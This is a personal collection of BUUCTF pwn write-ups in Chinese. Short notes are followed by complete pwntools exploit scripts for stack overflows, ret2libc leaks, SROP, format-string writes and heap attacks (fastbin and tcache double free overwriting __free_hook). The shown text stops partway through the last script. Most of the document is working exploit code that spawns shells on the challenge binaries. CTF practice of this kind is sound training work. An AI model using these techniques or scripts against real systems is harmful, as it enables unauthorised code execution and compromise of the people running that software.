记录下自己在buuctf的wp

test_your_nc

连上就有flag

rip

64位,啥都没开,
程序原本是想让我们覆盖返回地址跳转到system(/bin/sh)
但是后来远程环境换成了 Ubuntu 18, 直接返回到 system("/bin/sh") 打不通了 (一般是因为 Ubuntu 18 的 libc 里 system() 内部有 movaps 指令, 要求进入时栈 16 字节对齐; 多加一个 ret gadget 或者改用 execve 都可以绕过)
所以就稍微麻烦一点: 先泄露 libc 基址, 再用 execve("/bin/sh", 0, 0) 拿 shell

from pwn import *
from LibcSearcher import LibcSearcher

# rip: leak libc through puts(GOT[__libc_start_main]), return into main,
# then run a second ROP chain that calls execve("/bin/sh", ...).
context.log_level="debug"
p=process('./pwn1')
#p=remote('node3.buuoj.cn',27902)
elf=ELF('./pwn1')
# Gadget / symbol addresses taken from the (non-PIE) binary.
pop_rdi_ret=0x004011fb
pop_rsi_r15_ret=0x04011f9
main_addr=0x0401142
__libc_start_main=elf.got['__libc_start_main']
puts_plt=elf.plt['puts']
p.recvuntil('please input\n')
#gdb.attach(p)
# 23 bytes reach the saved return address (binary-specific offset), then
# puts(&GOT[__libc_start_main]) and a return into main for a second round.
payload='A'*23+p64(pop_rdi_ret)+p64(__libc_start_main)+p64(puts_plt)+p64(main_addr)

p.sendline(payload)

p.recvuntil('ok,bye!!!\n')
# puts() emits the 6 significant bytes of the pointer; zero-pad for u64().
__libc_start_addr=u64(p.recv(6).ljust(8,'\x00'))
# LibcSearcher picks a libc build matching the leaked symbol (it may prompt
# when several builds match).
libc=LibcSearcher('__libc_start_main',__libc_start_addr)
libcdata_addr=__libc_start_addr-libc.dump('__libc_start_main')  # libc base
execve_addr=libcdata_addr+libc.dump('execve')
binsh_addr=libcdata_addr+libc.dump('str_bin_sh')
print "libcdata_addr=>",hex(libcdata_addr)
p.recvuntil('please input\n')
# execve(binsh, 0, rdx): only rdi and rsi are set by this chain, so envp is
# whatever rdx happens to hold when execve runs. That worked against this
# target; if execve ever fails with EFAULT, add a gadget that zeroes rdx.
payload='A'*23+p64(pop_rdi_ret)+p64(binsh_addr)+p64(pop_rsi_r15_ret)+p64(0)+p64(0)+p64(execve_addr)
p.sendline(payload)

p.interactive()

warmup_csaw_2016

程序中给了system(/bin/sh),覆盖返回地址改跳转就行

from pwn import *

# warmup_csaw_2016: plain ret2text. The binary already contains a
# system("/bin/sh") call at 0x40060d (see the note above); 72 bytes of
# padding reach the saved return address, which is pointed at it.
#p=process('./warmup_csaw_2016')
p = remote('node3.buuoj.cn', 28168)

win_addr = 0x40060d   # system("/bin/sh") inside the binary
pad_len = 72          # bytes from the input buffer to the saved return address
chain = ''.join(['A' * pad_len, p64(win_addr)])
p.sendlineafter('>', chain)

p.interactive()

pwn1_sctf_2016

C++ 程序, 会把输入里的每个 I 替换成 you (1 字节变 3 字节), 替换后的字符串变长了, 从而造成栈溢出

from pwn import *

# pwn1_sctf_2016: every 'I' in the input is rewritten to "you" (1 -> 3 bytes),
# so 21 * 3 + 1 = 64 bytes of padding reach the saved return address, which
# is then replaced by 0x8048F0D (32-bit, hence a 4-byte address).
#p=process('./pwn1_sctf_2016')
p = remote('node3.buuoj.cn', 26705)

target = 0x8048F0D
expanded_pad = 'I' * 21 + 'a'   # 63 + 1 = 64 bytes after the I -> you rewrite
p.sendline(''.join([expanded_pad, p32(target)]))

p.interactive()

ciscn_2019_c_1

gets() 栈溢出, 先泄露 libc 地址再 getshell
中间会把 gets() 读到的输入"加密"一遍, 加密的长度是按 strlen() 算的, 所以在 payload 开头放一个 \x00, 后面的 ROP 链就不会被改动

from pwn import *
from LibcSearcher import LibcSearcher

# ciscn_2019_c_1: same leak-then-execve pattern as rip above, but the input
# goes through an "encrypt" routine that stops at strlen(), so a leading NUL
# byte leaves the rest of the payload untouched.
#context.log_level="debug"
#p=process('./ciscn')
p=remote('buuoj.cn',25206)
elf=ELF('./ciscn')
puts_plt=elf.plt['puts']
__libc_start_main=elf.got['__libc_start_main']

# Addresses from the (non-PIE) binary.
main_addr=0x00400B28
pop_rdi_ret=0x00400c83
pop_rsi_r15_ret=0x0400c81


p.recvuntil('Input your choice!\n')
p.sendline('1')
# 1 + 0x4f + 8 = 0x58 bytes (presumably buffer + saved rbp) reach the saved
# return address; then puts(&GOT[__libc_start_main]); main().
payload='\x00'+'A'*0x4f+p64(0)+p64(pop_rdi_ret)+p64(__libc_start_main)+p64(puts_plt)+p64(main_addr)
p.recvuntil('Input your Plaintext to be encrypted\n')
p.sendline(payload)

# Skip the two lines the program prints before our puts() output.
p.recvline()
p.recvline()

# 6 significant bytes of the leaked pointer, zero-padded for u64().
__libc_start_addr=u64(p.recv(6).ljust(8,'\x00'))
libc=LibcSearcher('__libc_start_main',__libc_start_addr)
libcbase_addr=__libc_start_addr-libc.dump('__libc_start_main')
execve_addr=libcbase_addr+libc.dump('execve')
binsh_addr=libcbase_addr+libc.dump('str_bin_sh')
print "libcbase_addr=>",hex(libcbase_addr)
p.recvuntil('Input your choice!\n')
p.sendline('1')
# execve("/bin/sh", 0, rdx): rdx is not set by this chain, so envp is whatever
# rdx holds at the call. The trailing main_addr is never reached if execve
# succeeds.
payload='\x00'+'A'*0x4f+p64(0)+p64(pop_rdi_ret)+p64(binsh_addr)+p64(pop_rsi_r15_ret)+p64(0)+p64(0)+p64(execve_addr)+p64(main_addr)
p.recvuntil('Input your Plaintext to be encrypted\n')
p.sendline(payload)
p.interactive()

ciscn_2019_n_1

覆盖栈上的一个浮点数 (脚本里写入的 0x41348000 就是 float 11.28125 的 IEEE 754 编码)
偷懒的办法是写个小 C 程序打印一下浮点数在内存里的字节, 或者直接动调看栈

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('n_ciscn')
# Declared as globals by pwn() below but never used in this script.
sh = 0
lib = 0
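def pwn(ip,port,debug):
    """Overflow the stack-resident float and drop into an interactive shell.

    Args:
        ip, port: remote target, used only when ``debug`` is not 1.
        debug: 1 runs ./n_ciscn locally (and attaches gdb); any other value
            connects to ip:port.
    """
    global sh
    global lib
    if(debug == 1):
        p = process('./n_ciscn')

    else:
        p = remote(ip,port)
    p.recvuntil("Let's guess the number.\n")
    # Only attach a debugger to a local process; gdb.attach() on a remote()
    # tube does not work, and the original unconditional call broke remote runs.
    if(debug == 1):
        gdb.attach(p)
    # 0x30-4 bytes of padding, then the float's IEEE-754 bits
    # (0x41348000 == 11.28125f) on top of the variable being compared.
    p.sendline('A'*(0x30-4)+p32(0x41348000))

    p.interactive()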
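if __name__ == '__main__':
    # debug=1: run the local binary; ip/port are only used when debug != 1.
    pwn('buuoj.cn',20035,1)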

[OGeek2019]babyrop

from pwn import *
from LibcSearcher import LibcSearcher

# [OGeek2019]babyrop (32-bit): two rounds through main -- leak
# __libc_start_main with puts(), then system("/bin/sh").
p=process('./pwn')

elf=ELF('./pwn')
puts_plt=elf.plt['puts']
__libc_start_main=elf.got['__libc_start_main']

# First input: the leading NUL presumably makes the string comparison pass
# (it stops at the NUL), and the 0xff byte looks like the length the program
# later allows for the read that we overflow -- confirm in the binary.
p.sendline('\x00'*7+'\xff')
main_addr=0x08048825

p.recvuntil('Correct\n')
# 0xE7 + 4 bytes reach the saved return address; 32-bit cdecl chain:
# callee, fake return address, argument.
payload='A'*0xE7+p32(0)+p32(puts_plt)+p32(main_addr)+p32(__libc_start_main)
p.sendline(payload)
# Assumes nothing else is printed before puts() writes the 4-byte pointer.
__libc_start_addr=u32(p.recv(4))
print "__libc_start_addr=>",hex(__libc_start_addr)
libc=LibcSearcher("__libc_start_main",__libc_start_addr)
libcdata_addr=__libc_start_addr-libc.dump('__libc_start_main')  # libc base
system_addr=libcdata_addr+libc.dump('system')
binsh_addr=libcdata_addr+libc.dump('str_bin_sh')
# Second round: same check bypass, then system("/bin/sh") with main as the
# fake return address.
p.sendline('\x00'*7+'\xff')
p.recvuntil('Correct\n')
payload='A'*0xE7+p32(0)+p32(system_addr)+p32(main_addr)+p32(binsh_addr)
p.sendline(payload)
p.interactive()

babyheap_0ctf_2017

单字节溢出

from pwn import *
from LibcSearcher import LibcSearcher
# babyheap_0ctf_2017: single-byte heap overflow (see note above).
p=process('./babyheap')
#p=remote('node3.buuoj.cn',25895)
context.log_level="debug"
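def Allocate(Size):
    """Menu command 1: allocate a chunk of ``Size`` bytes (the program assigns the index)."""
    p.sendlineafter('Command: ','1')
    p.sendlineafter('Size: ',str(Size))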
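def Fill(Index,Size,context):
    """Menu command 2: write ``Size`` bytes of ``context`` into chunk ``Index``.

    NOTE: the parameter name shadows pwntools' ``context`` object inside this
    function; it is only the data to write (the size check is the program's
    bug, so Size may exceed the chunk).
    """
    p.sendlineafter('Command: ','2')
    p.sendlineafter('Index: ',str(Index))
    p.sendlineafter('Size: ',str(Size))
    p.sendafter('Content: ',context)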
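def Free(Index):
    """Menu command 3: free chunk ``Index``."""
    p.sendlineafter('Command: ','3')
    p.sendlineafter('Index: ',str(Index))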
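def Dump(Index):
    """Menu command 4: print the contents of chunk ``Index`` (caller reads the output)."""
    p.sendlineafter('Command: ','4')
    p.sendlineafter('Index: ',str(Index))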
# Heap layout after these allocations (indices assigned in order):
#   0..3 : 0x20 chunks   4 : 0x90 chunk   5 : 0x20 chunk   6 : 0x70 chunk
Allocate(0x10)#
Allocate(0x10)
Allocate(0x10)
Allocate(0x10)
Allocate(0x80)
Allocate(0x10)
Allocate(0x68)
# Two 0x20 chunks into the fastbin; list head is 1 -> 2.
Free(2)
Free(1)

# Overflow from chunk 0 into chunk 1: 3*8 bytes cover chunk 0's data and
# chunk 1's prev_size, 0x21 rewrites its size, and the single 0x80 byte
# replaces the low byte of chunk 1's fastbin fd so it points at chunk 4
# (chunks 0..3 are 0x20 each, so chunk 4 sits at heap offset 0x80 --
# assumes the first chunk is at a 0x100-aligned address).
payload=p64(0)*3+p64(0x21)+'\x80'
Fill(0,len(payload),payload)

# Give chunk 4 a fake 0x21 size (overflow from chunk 3) so the fastbin
# size check accepts it.
payload=p64(0)*3+p64(0x21)
Fill(3,len(payload),payload)

# Take chunk 1 back; the next 0x20 allocation is really chunk 4, so index 2
# and index 4 now alias the same memory.
Allocate(0x10)#1
Allocate(0x10)#2

# Restore chunk 4's real size (0x91) and allocate one more 0x90 chunk
# (index 7; it holds "/bin/sh" at the end).
payload= p64(0)*3+p64(0x91)
Fill(3,len(payload),payload)
Allocate(0x80)
# Free chunk 4 into the unsorted bin (fd/bk -> main_arena) and read them
# through the aliasing index 2.
Free(4)
Dump(2)
p.recvline()
# main_arena+88 -> __libc_start_main delta, measured on the author's local
# libc (0x7f409c186b78 - 0x7f409bde2740 = 0x3a4438); only valid for that build.
libc_start_main=u64(p.recv(6).ljust(8,'\x00'))-(0x7f409c186b78-0x7f409bde2740)
print 'libc_start_main=>',hex(libc_start_main)
libc=LibcSearcher('__libc_start_main',libc_start_main)
libcbase_addr=libc_start_main-libc.dump('__libc_start_main')
print 'libcbase_addr=>',hex(libcbase_addr)
free_hook_addr=libcbase_addr+libc.dump('__free_hook')
system_addr=libcbase_addr+libc.dump('system')
print "free_hook_addr=>",hex(free_hook_addr)
# Rewrite chunk 4 (still in the unsorted bin) from chunk 3: size 0x91, fd = 0,
# bk = __free_hook-0x40. Taking it back out makes malloc store the unsorted
# bin head pointer at bk->fd, i.e. at __free_hook-0x30; that libc pointer's
# 0x7f byte serves as a fake chunk size below.
payload= p64(0)*3+p64(0x91)+p64(0)+p64(free_hook_addr-0x40)
Fill(3,len(payload),payload)
Allocate(0x80)
# Free the 0x70 chunk (index 6) into its fastbin, then overflow from chunk 5
# to point its fd at __free_hook-0x33: the size field of that fake chunk
# (__free_hook-0x2b) is the 0x7f byte of the pointer planted above, which
# passes the fastbin size check for the 0x70 bin.
Free(6)
payload=p64(0)*3+p64(0x71)+p64(free_hook_addr-0x33)
Fill(5,len(payload),payload)
Allocate(0x68)#6
Allocate(0x68)#8
# Index 8's data starts at __free_hook-0x23: 35 filler bytes, then system().
payload='\x00'*35+p64(system_addr)
Fill(8,len(payload),payload)
# free("/bin/sh") now calls system("/bin/sh").
Fill(7,8,'/bin/sh\x00')
Free(7)

#gdb.attach(p)

p.interactive()

get_started_3dsctf_2016

静态编译, 本以为很简单, 其实看来 NX 是开着的, 不能直接跑栈上的 shellcode: 要先 ROP 调 mprotect 把一页内存改成 RWX (prot=7), 再用 read 把 shellcode 读进去然后跳过去

from pwn import *

# get_started_3dsctf_2016: static binary, so there is no libc to leak. ROP
# into mprotect() to make a page RWX, read() shellcode into it, jump there.
context.arch = "i386"
#context.log_level='debug'
p=remote('node3.buuoj.cn',27708)
#p=process('./get_sta')
elf=ELF('get_sta')
#mprotect_plt=elf.plt['mprotect']
#read_plt=elf.plt['read']
pop_3_ret=0x0804f460   # pops the three arguments of the preceding call
#gdb.attach(p)
# 56 bytes of padding, then (32-bit cdecl):
#   0x806EC80 (presumably mprotect): mprotect(0x080EB000, 0x1000, 7 /*RWX*/)
#   pop_3_ret discards the three args, then
#   0x806E14A (presumably read): read(1, 0x080EB000, 0x100), whose fake
#   return address 0x080EB000 jumps into the shellcode just read.
# NOTE: fd 1 (stdout) is used for read(). That only works when stdin and
# stdout are the same socket, as under the remote socat/xinetd wrapper;
# locally with pipes use fd 0 (as the not_the_same script below does).
payload='A'*56+p32(0x806EC80)+p32(pop_3_ret)+p32(0x080EB000)+p32(0x1000)+p32(7)+p32(0x806E14A)+p32(0x080EB000)+p32(1)+p32(0x080EB000)+p32(0x100)

p.sendline(payload)
# Let the chain reach read() before the shellcode arrives, so the overflowing
# read does not swallow it together with the payload.
sleep(1)
p.sendline(asm(shellcraft.sh()))
p.interactive()

[第五空间2019 决赛]PWN5

格式化字符串改个值

from pwn import *

# [第五空间2019 决赛]PWN5: format-string write. The name is passed straight
# to printf, so "%14$hn%15$hn" stores the number of characters printed so
# far (0) as a short at positional arguments 14 and 15 -- i.e. it zeroes the
# 4 bytes at 0x804C044.
#p=remote('node3.buuoj.cn',28966)
p=process('./pwn')
# Pad the format to 16 bytes so the two addresses land exactly on args 14/15
# (the stack offsets are binary-specific; found with gdb).
payload='%14$hn%15$hn'.ljust(16,'A')+p32(0x804C044)+p32(0x804C046)
#gdb.attach(p)
p.sendlineafter('your name:',payload)
# The password is presumably parsed with atoi(); these bytes parse as 0,
# matching the value just written.
payload=p32(0x00040004)+p32(0)
p.sendlineafter('your passwd:',payload)

p.interactive()

not_the_same_3dsctf_2016

写32位shellcode


from pwn import*

# not_the_same_3dsctf_2016: same static-binary trick as get_started above --
# mprotect() a page RWX, read() shellcode into it, jump to it.
context.arch = "i386"
#p=remote('node3.buuoj.cn',26098)
p=process('./not_3dsctf_2016')
#gdb.attach(p)
pop3_ret=0x0804f420    # pops the three mprotect arguments
mprotect=0x806ED40
# 45 bytes of padding, then mprotect(0x80EB000, 0x1000, 7), pop3_ret, then
# 0x806E200 (presumably read): read(0, 0x80EB000, 0x100) returning into the
# freshly written shellcode at 0x80EB000.
payload = 'a'*45+p32(mprotect)+p32(pop3_ret)+p32(0x80EB000)+p32(0x1000)+p32(7)+p32(0x806E200)+p32(0x80EB000)+p32(0)+p32(0x80EB000)+p32(0x100)

p.sendline(payload)

# The shellcode is sent immediately. If both lines arrive in one read() of
# the overflowing input, the shellcode is eaten there; a sleep(1) between
# the two sends (as in get_started) avoids that.
p.sendline(asm(shellcraft.sh()))
p.interactive()

ciscn_2019_n_8

动调下吧

from pwn import *

# ciscn_2019_n_8: overwrite the variable 0x34 bytes past the input buffer
# with 0x11 (presumably the value the check expects); see the note above
# about confirming the offset with a debugger.
#p=process('./ciscn')
p = remote('node3.buuoj.cn', 25006)
#gdb.attach(p)

p.recvuntil("What's your name?\n")
overwrite = ''.join(['A' * 0x34, p32(0x11), p32(0), "C"])
p.sendline(overwrite)
p.interactive()

babyfengshui_33c3_2016

32 位堆题, 利用堆溢出把 free 的 GOT 表项改成 system, 再 free 掉内容为 /bin/sh 的 chunk

from pwn import *
from LibcSearcher import LibcSearcher

#context.log_level="debug"
p=process('./babyfengshui')
#p=remote('node3.buuoj.cn',29500)
elf=ELF('./babyfengshui')
free_got=elf.got['free']   # GOT slot that gets redirected to system()
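def Allocate(descrip,name,length,text):
    """Menu action 0: create a user.

    descrip: size of the description buffer; name: the user's name;
    length/text: length and content of the text written into the description
    (the program's bounds check is the bug, so length may exceed descrip).
    """
    p.sendlineafter('Action: ','0')
    p.sendlineafter('size of description: ',str(descrip))
    p.sendlineafter('name: ',name)
    p.sendlineafter('text length: ',str(length))
    p.recvuntil('text: ')
    p.sendline(text)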
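def Update(Index,length,text):
    """Menu action 3: rewrite user ``Index``'s description with ``length`` bytes of ``text``."""
    p.sendlineafter('Action: ','3')
    p.sendlineafter('index: ',str(Index))
    p.sendlineafter('text length: ',str(length))
    p.sendafter('text: ',text)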
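def Free(Index):
    """Menu action 1: delete user ``Index`` (frees its description and struct)."""
    p.sendlineafter('Action: ','1')
    p.sendlineafter('index: ',str(Index))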
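def Dump(Index):
    """Menu action 2: display user ``Index`` (caller parses the 'description: ' line)."""
    p.sendlineafter('Action: ','2')
    p.sendlineafter('index: ',str(Index))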

# Users 0..3, laid out as description / user-struct pairs on the heap;
# user 3's description is "/bin/sh" for the final free().
Allocate(0x80,'\xee'*4,0x80,'\xee'*4)
Allocate(0x10,'\x11'*4,0x10,'\x22'*4)
Allocate(0x80,'\x11'*4,0x80,'\x22'*4)
Allocate(0x10,'/bin/sh\x00',0x10,'/bin/sh\x00')
# Free user 0 so the next 0x100 description lands below everyone else. The
# text length check apparently only bounds against that user's own struct,
# so a 0x200-byte text overflows upward through user 1's description chunk
# (0x19 header) into user 1's struct (0x89 header), whose first field --
# the description pointer -- becomes free@got.
Free(0)
payload='\x11'*0x108+p32(0)+p32(0x19)+'j'*8+p64(0)+p32(0)+p32(0x89)+p32(free_got)
Allocate(0x100,'\x00',0x200,payload)
# Displaying user 1 now prints the 4 bytes at free@got.
Dump(1)
p.recvuntil('description: ')
free_addr=u32(p.recv(4))
print "free_addr=>",hex(free_addr)
libc=LibcSearcher('free',free_addr)
libcdata_addr=free_addr-libc.dump('free')   # libc base
print "libcdata_addr=>",hex(libcdata_addr)
system_addr=libcdata_addr+libc.dump('system')
print "system_addr=>",hex(system_addr)
# Updating user 1's text writes through the hijacked pointer: free@got = system.
Update(1,0x4,p32(system_addr))

# Deleting user 3 calls free("/bin/sh") -> system("/bin/sh").
Free(3)

p.interactive()

ciscn_2019_s_3

SROP

from pwn import *

# ciscn_2019_s_3: SROP. A sigreturn frame is built with pwntools and
# triggered through rt_sigreturn (rax = 15) to land in execve("/bin/sh", 0, 0).
#p=process('./ciscn')
p=remote('node3.buuoj.cn',27381)
context.arch = "amd64"
elf = ELF("ciscn")
main_addr=0x40051D

mov_eax_0xf_ret=0x4004DA    # rax = 15 (SYS_rt_sigreturn)
syscall_ret=0x400517
read_write_ret = 0x4004F1   # re-enters the routine that reads then writes the stack back
# 16 bytes fill the buffer ("/bin/sh" at its start), then return into the
# read/write routine so it echoes stack contents, including a stack pointer.
payload='/bin/sh\x00'.ljust(16,'A')+p64(read_write_ret)


p.sendline(payload)
p.recvuntil('AAAAAAAA')
# Bytes 16..22 of what follows are a stack pointer (6 significant bytes).
# NOTE: p.recv() returns whatever has arrived so far; if the output is split
# across packets this slice is wrong -- recv(n) with an exact count is safer.
stack_addr=u64(p.recv()[16:22].ljust(8,'\x00'))
print "stack_addr=>",hex(stack_addr)

# Distance from the leaked pointer back to our "/bin/sh" (found with gdb).
binsh = stack_addr - 0x118
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve
sigframe.rdi = binsh
#sigframe.rsp = stack_addr
sigframe.rip = syscall_ret
sigframe.rsi = 0
sigframe.rdx = 0
#gdb.attach(p)

# Second overflow: rax = 15; syscall (sigreturn) restores the registers from
# the frame that follows on the stack and resumes at rip = syscall -> execve.
payload='a'*16+p64(mov_eax_0xf_ret)+p64(syscall_ret)+str(sigframe)
p.send(payload)
p.interactive()

[HarekazeCTF2019]baby_rop

from pwn import *

# [HarekazeCTF2019]baby_rop: 24 bytes (16 + a saved register slot) reach the
# saved return address; the chain is gadget, argument, call target --
# presumably pop rdi; ret, a pointer to "/bin/sh", and the system() call
# site, all taken from the binary (verify in the disassembly).
p = process('./babyrop')
#p=remote('node3.buuoj.cn',25812)
elf = ELF('./babyrop')

p.recvuntil("What's your name? ")
main_addr = 0x4005D6   # not used by the chain; kept for reference
gadget, arg, target = 0x400683, 0x601048, 0x4005e3
rop = ''.join(['A' * 16, p64(0), p64(gadget), p64(arg), p64(target)])
#gdb.attach(p)
p.sendline(rop)
#print p.recv()
p.interactive()

ciscn_2019_final_3

先让 chunk 逃出 tcache 才能泄露 libc:
tcache 只接管 chunk size 不超过 0x410 的块 (不是 0x500), 所以先用 tcache double free 把一个 chunk 的 size 改成 0x481, 这样 free 后它会进 unsorted bin, fd/bk 指向 main_arena, 从而泄露出 libc 基址;
然后再用一次 tcache double free 把 __free_hook 改写成 system, free 掉存有 /bin/sh 的 chunk 即可

from pwn import *

# ciscn_2019_final_3: tcache (glibc 2.27) heap exploit, see note above.
p=process('./ciscn_final_3')
#p=remote('node3.buuoj.cn',29871)
#context.log_level="debug"
elf=ELF('./ciscn_final_3')
free_got=elf.got['free']   # printed below; not used by the exploit itself
print "free_got=>",hex(free_got)
# Symbol offsets come from the local libc; for the remote target point this
# at the libc shipped with the challenge.
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
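def add(Index,length,size):
    """Menu choice 1: allocate ``length`` bytes in slot ``Index`` and write ``size`` into it.

    ``size`` is the content to write (the name is misleading). The program
    then prints a "gift :0x<heap address>" line that the caller may read.
    """
    p.sendlineafter('choice > ','1')
    p.sendlineafter('input the index\n',str(Index))
    p.sendlineafter('input the size\n',str(length))
    p.sendafter('now you can write something\n',size)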
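def free(Index):
    """Menu choice 2: free slot ``Index`` (the program does not clear the slot, hence double free)."""
    p.sendlineafter('choice > ','2')
    p.sendlineafter('input the index\n',str(Index))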
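# Slot 0 is the chunk we double-free; slot 1's gift gives us a heap address.
add(0,0x78,'\x00'*0x78)

add(1,0x78,p64(0x78))
# Read the gift right after the add() that printed it: every later
# sendlineafter() swallows unread output up to the next prompt.
p.recvuntil('gift :0x')
addr=int(p.recv(12),16)
# More 0x80 chunks: the 0x480 fake chunk built below spans these, and slot 9
# holds "/bin/sh" for the final free().
add(2,0x78,'b'*0x78)
add(3,0x78,'x')
add(4,0x78,'\x33' * 0x78)
add(5,0x78,'\x44' * 0x78)
add(6,0x78,'\x55' * 0x78)
add(7,0x78,'\x66' * 0x78)
add(8,0x78,'\x77' * 0x78)
add(9,0x78,'/bin/sh\x00')
add(10,0x78,'aa')
add(11,0x78,'aa')
# tcache double free (this glibc has no double-free check).
free(0)
free(0)

print "addr",hex(addr)
# Poison the tcache fd so the third allocation lands on a chunk header
# (addr-0x10), then rewrite that header with size 0x481: above the tcache
# limit (0x410), so freeing it goes to the unsorted bin instead.
add(12,0x78,p64(addr-0x10))
add(13,0x78,p64(addr-0x10))
add(14,0x78,p64(0)+p64(0x481))
p.recvuntil('gift :0x')
addr2=int(p.recv(12),16)
print "addr2=>",hex(addr2)
free(1)
# Second tcache double free (0x70 bin) pointed into the freed big chunk, so
# that one of the following allocations apparently returns its main_arena
# fd as the gift -- that is the libc leak.
add(15,0x68,'aa')
free(15)
free(15)
# gdb.attach(p) -- enable only for a local process(); it fails against remote().
#gdb.attach(p)
add(16,0x68,p64(addr2+0x80))
add(17,0x68,p64(addr2+0x80))
add(18,0x68,'\x00')
add(19,0x68,'\x00')
p.recvuntil('gift :0x')
addr3=int(p.recv(12),16)
# 0x3EBCA0 is main_arena+96 in Ubuntu 18.04's glibc 2.27 build; this ties
# the script to that exact libc.
libcdata_addr=addr3-0x3EBCA0
system_addr=libcdata_addr+libc.symbols['system']
__free_hook=libcdata_addr+libc.symbols['__free_hook']
print "__free_hook=>",hex(__free_hook)
print "libcdata_addr=>",hex(libcdata_addr)
print "addr3=>",hex(addr3)
# Third tcache double free (0x40 bin): point the fd at __free_hook, write
# system() there, then free("/bin/sh").
add(20,0x38,p64(0xdeadbeef))
free(20)
free(20)
add(21,0x38,p64(__free_hook))
add(22,0x38,p64(__free_hook))
add(23,0x38,p64(system_addr))
free(9)

# See above: only attach a debugger when running locally.
#gdb.attach(p)

p.interactive()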

pwn2_sctf_2016

典型泄露地址然后getshell

from pwn import *
from LibcSearcher import LibcSearcher

# pwn2_sctf_2016 (32-bit): the byte count -12 presumably passes a signed
# length check and is then used as a large unsigned read length. Round 1
# leaks printf's GOT entry through printf(), round 2 calls system("/bin/sh").
p=process('./pwn_2_sctf_2016')
#p=remote('buuoj.cn',29982)
elf=ELF('./pwn_2_sctf_2016')
printf_got=elf.got['printf']
printf_plt=elf.plt['printf']
p.sendlineafter('read? ','-12')
#gdb.attach(p)
p.recvuntil('bytes of data!\n')
main_addr=0x08048535
V5_0=0x080483D0   # fake return address after printf/system (name from IDA)
# 0x2C + 4 bytes reach the saved return address (buffer + saved ebp).
# printf(0x80486F8, printf@got): 0x80486F8 is presumably a format string
# containing %s, so the GOT value is printed after the second "said: ".
payload='A'*0x2C+'A'*4+p32(printf_plt)+p32(V5_0)+p32(0x80486F8)+p32(printf_got)
p.sendline(payload)
p.recvuntil('said: ')
p.recvuntil('said: ')
printf_addr=u32(p.recv(4))
print "printf_addr=>",hex(printf_addr)
libc=LibcSearcher('printf',printf_addr)
libcdata_addr=printf_addr-libc.dump('printf')   # libc base
system_addr=libcdata_addr+libc.dump('system')
bin_sh_addr=libcdata_addr+libc.dump('str_bin_sh')
# Same length-check bypass, then system("/bin/sh").
p.sendlineafter('read? ','-12')
p.recvuntil('bytes of data!\n')
payload='A'*0x2C+'A'*4+p32(system_addr)+p32(V5_0)+p32(bin_sh_addr)
p.sendline(payload)
p.interactive()

ez_pz_hackover_2016

写个shellcode就行,

from pwn import *

# ez_pz_hackover_2016 (32-bit, judging by p32; context.arch is left at the
# i386 default that shellcraft.sh() uses): the program prints a stack
# address, the input must start with "crashme\0", and the rest overflows
# the return address, which is pointed back at the shellcode in the same input.
#p=process('./ez_pz_hackover')
p=remote('node3.buuoj.cn',25160)
p.recvuntil('0x')
# Leaked pointer -> address where our shellcode ends up (offset found with gdb).
stack_addr=int(p.recv(8),16)+8-0x24
print "stack_addr=>",hex(stack_addr)
p.recvuntil('> ')
#gdb.attach(p)
shellcode=asm(shellcraft.sh())
print len(shellcode)
# "crashme\0" passes the check; 18 more bytes reach the saved return
# address, which becomes stack_addr, and the shellcode follows it.
payload='crashme\x00'+'AAAAAAAAAA'+'A'*8+p32(stack_addr)+shellcode
p.sendline(payload)
p.interactive()

ciscn_2019_n_5

和 rip 那题一样, 直接 system('/bin/sh') 打不通, 还是改用 execve('/bin/sh', 0, 0)

from pwn import *
#from LibcSearcher import LibcSearcher

# ciscn_2019_n_5: leak via puts(GOT), then execve("/bin/sh") with offsets
# taken from a libc.so.6 on disk (LibcSearcher left in as an alternative).
#p=remote('node3.buuoj.cn',28049)
p=process('./ciscn')
elf=ELF('./ciscn')
context.arch = "amd64"
libc=ELF('libc.so.6')   # must be the target's libc for the offsets to hold
pop_rdi_ret=0x0400713
pop_rsi_r15_ret=0x400711
main_addr=0x0400636
bss_addr=0x00601080     # unused here
puts_plt=elf.plt['puts']
__libc_start_main=elf.got['__libc_start_main']
p.recvuntil('tell me your name\n')

p.sendline('a')
p.recvuntil('say to me?\n')
# 40 bytes reach the saved return address; puts(&GOT[__libc_start_main]); main().
payload='A'*40+p64(pop_rdi_ret)+p64(__libc_start_main)+p64(puts_plt)+p64(main_addr)
p.sendline(payload)

# Assumes the next 6 bytes on the wire are the leaked pointer.
__libc_startaddr=u64(p.recv(6).ljust(8,'\x00'))
#libc=LibcSearcher('__libc_start_main',__libc_startaddr)
libcdata_addr=__libc_startaddr-libc.symbols['__libc_start_main']   # libc base
print "libcdata_addr=>",hex(libcdata_addr)
system_addr=libcdata_addr+libc.symbols['system']
exeace_addr=libcdata_addr+libc.symbols['execve']   # (sic) execve
binsh = libcdata_addr +libc.search("/bin/sh\x00").next()
print "system_addr=>",hex(system_addr)
p.recvuntil('tell me your name\n')
#gdb.attach(p)
p.sendline('/bin/sh\x00')
p.recvuntil('say to me?\n')
# system() variant kept for reference; execve is used because system()
# crashed on the target (stack alignment, see the note above). rdx is not
# set by this chain, so envp is whatever rdx holds at the call.
#payload='a'*40+p64(pop_rdi_ret)+p64(binsh)+p64(system_addr)
payload='B'*40+p64(pop_rdi_ret)+p64(binsh)+p64(pop_rsi_r15_ret)+p64(0)+p64(0)+p64(exeace_addr)
p.sendline(payload)
p.interactive()

ciscn_2019_ne_5

跟上面思路差不多

from pwn import *
from LibcSearcher import LibcSearcher

# ciscn_2019_ne_5 (32-bit): log in as "administrator", overflow through the
# "info" input, and let menu option 4 trigger the vulnerable copy. Round 1
# leaks __libc_start_main; round 2 calls system("/bin/sh").
p=remote('node3.buuoj.cn',29316)
#p=process('./ciscn')
elf=ELF('./ciscn')
__libc_start_main=elf.got['__libc_start_main']
system_addr=elf.plt['system']   # system@plt: the binary imports system()
main_addr=0x8048722
pop2_ret=0x0804871f             # unused
p.sendlineafter('password:','administrator')
p.sendlineafter(':','1')

# 76 bytes reach the saved return address. 0x08048490 is presumably
# printf@plt and 0x80489F5 a "%s"-style format string; the GOT entry is
# its argument and main_addr the fake return address.
payload='A'*76+p32(0x08048490)+p32(main_addr)+p32(0x80489F5)+p32(__libc_start_main)

p.sendlineafter('info:',payload)
p.sendlineafter(':','4')
# The log banner appears twice before the leaked bytes; skip both.
p.recvuntil('The flag is your log:')
p.recvuntil('The flag is your log:')
__libc_start_addr=u32(p.recv(4))
libc=LibcSearcher('__libc_start_main',__libc_start_addr)
